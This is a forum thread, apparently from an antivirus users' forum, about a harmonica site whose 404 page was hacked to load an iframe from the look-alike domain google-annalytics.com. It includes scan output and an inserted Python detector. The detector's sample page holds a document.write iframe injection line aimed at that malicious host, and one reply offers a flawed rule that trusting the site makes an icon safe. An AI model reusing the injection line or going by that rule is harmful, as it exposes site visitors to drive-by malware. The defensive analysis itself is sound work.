Trojan Blocked HTML IFRAME

Hi,

Just browsed into Harptabs.com, a harmonica resource, and Avast blocked a Trojan, HTML IFRAME JQ TRJ.
Just thought I’d pass it on…
(the warning, not the trojan :))

VirusTotal - unp211969873.tmp - 5/41
http://www.virustotal.com/analisis/2c38cae2223f02e81f7ce5f36343ea8e93c76e56f43b8cf38a612c443b991db4-1276554949

This page seems to be
http://www.UnmaskParasites.com/security-report/?page=www.harptabs.com

The site appears to have been hacked, in the form of a 404 error page having been hacked to include an obfuscated script tag after the closing HTML tag (image1), a standards no-no and highly suspect.

This is a common trick where it can have a reference to a file or image on the page which doesn’t exist and this causes a custom 404 error page to be displayed.

The obfuscated script creates an iframe tag and tries to run a cgi script on a site posing as google-analytics.com; see image2 for the de-obfuscated script (note the nn in the domain name, the only difference from the real name). This is reported as an attack site (image3) and doesn’t have a very good rep, see http://www.mywot.com/en/scorecard/google-annalytics.com.

At the moment the site is given as clean here: 2010-06-13 16:21:45 (GMT 1)
Website harptabs.com
Domain Hash 895195f2cf995e77aafddd79524bb6ff
IP Address 207.58.130.65 [SCAN]
IP Hostname srv.maiavps.com
IP Country US (United States)
AS Number 25847
AS Name SERVINT - ServInt
Detections 0 / 20 (0 %)
Status CLEAN

Here we checked the iFrames there:
(Level: 0) Url checked:
http://wXw.harptabs.com
Google code detected (Ads, not a cheater)
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
type=text/javascript htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
htxp://pagead2.googlesyndication.com/pagead/+$(aa(c))+
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://www.windowslivetranslator.com/translatepagelink.aspx?pl=en
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
type=text/javascript htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
htxp://pagead2.googlesyndication.com/pagead/+$(aa(c))+
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
htxp://pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
htxp://pagead2.googlesyndication.com/pagead/+$(aa(c))+
Blank page / could not connect
No ad codes identified

The “blank page / could not connect” results are suspicious: (referer=pagead2.googlesyndication.com/pagead/show_ads.js) failure: HTTP Error 404: Not Found) could mean the page has now been cleansed…
or has become unavailable…
Source of the hack: http://blog.unmaskparasites.com/2009/03/26/google-analytics-is-an-intermediary-in-malware-distribution/
more links via http://www.unmaskparasites.com/web-page-options/?url=http%3A//google-annalytics.com
and
http://blog.unmaskparasites.com/2009/03/26/google-analytics-is-an-intermediary-in-malware-distribution/

polonus

It might be given as clean, but that certainly isn’t the case.

The 404 error page is a hacked page, all you need to trigger that is to delete the favicon.ico file or insert another link to a non-existent image, etc.

The problem is that many of these so-called analysis sites are well behind avast, as none of them are detecting the obfuscated script, creating an iframe tag and running a cgi script on what is a malicious site.
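A check for the pattern DavidR describes in this post and his earlier one (a script tag appended after the closing </html> of the 404 page, writing an iframe to a look-alike of google-analytics.com), added here as an example; it is not code from the thread or from any scanner mentioned in it. The sample page, the TRUSTED allow-list and the two-label registrable-domain rule are assumptions.

```python
import re

# Constructed sample 404 page (not the real payload): a script appended after
# </html> writes a hidden iframe pointing at a look-alike analytics domain.
SAMPLE_404 = """<html><head><title>404 Not Found</title></head>
<body><h1>Not Found</h1><img src="/favicon.ico"></body></html>
<script type="text/javascript">document.write('<iframe src="http://google-annalytics.com/cgi-bin/x.cgi" width=1 height=1></iframe>');</script>
"""
TRUSTED = ["google-analytics.com", "googlesyndication.com"]  # assumed allow-list

def trailing_scripts(html):
    """Bodies of <script> elements that sit after the closing </html> tag."""
    idx = html.lower().rfind("</html>")
    if idx < 0:
        return []
    tail = html[idx + len("</html>"):]
    return re.findall(r"<script[^>]*>(.*?)</script>", tail, flags=re.I | re.S)

def extract_hosts(text):
    """Hostnames of every http(s) URL embedded in a script body."""
    return re.findall(r"https?://([a-z0-9.-]+)", text, flags=re.I)

def levenshtein(a, b):
    """Edit distance, used to spot typo-squatted domain names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable(host):
    """Last two labels of a host. Assumption: no multi-label suffixes like co.uk."""
    return ".".join(host.lower().split(".")[-2:])

def lookalikes(hosts, trusted=TRUSTED, max_dist=2):
    """(host, trusted_domain, distance) for hosts that nearly match a trusted one."""
    flagged = []
    for h in hosts:
        for t in trusted:
            d = levenshtein(registrable(h), t)
            if 0 < d <= max_dist:
                flagged.append((h, t, d))
    return flagged

def audit_404(html):
    """Summarise trailing scripts, the hosts they reference, and look-alike hits."""
    scripts = trailing_scripts(html)
    hosts = [h for s in scripts for h in extract_hosts(s)]
    return {"trailing_scripts": len(scripts), "hosts": hosts, "lookalikes": lookalikes(hosts)}
```

Feed audit_404 the body returned for a deliberately non-existent path (the favicon trick in the post above); any trailing script or a non-empty lookalikes list is the signal to look at the 404 template, not the scanner verdict.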

Hi DavidR,

So certainly malicious, as here in this example: htxp://jsunpack.jeek.org/dec/go?report=4763561f9a382a64263a17f5d80e386fb53d9a51
If the icon comes from the website and you trust that site, you can assume it is safe. If it comes from an unknown source, consider it malicious.

polonus

I posted an image of the de-obfuscated script from jsunpack.jeek.org in my first reply rather than post a link, which would alert if you changed the x to view the page; there are many in the forums who are too curious, which is why I post images ;D

It doesn’t matter where the image comes from, assuming we are even able to find what is missing that would be triggering the 404 error page, which is hacked. So we can’t make any assumption that it is safe; trust has nothing to do with it, as the site is currently hacked.

Until that 404 error page is cleaned and the vulnerability which allowed the site to be hacked is closed it isn’t safe and we can be thankful that avast is on to it.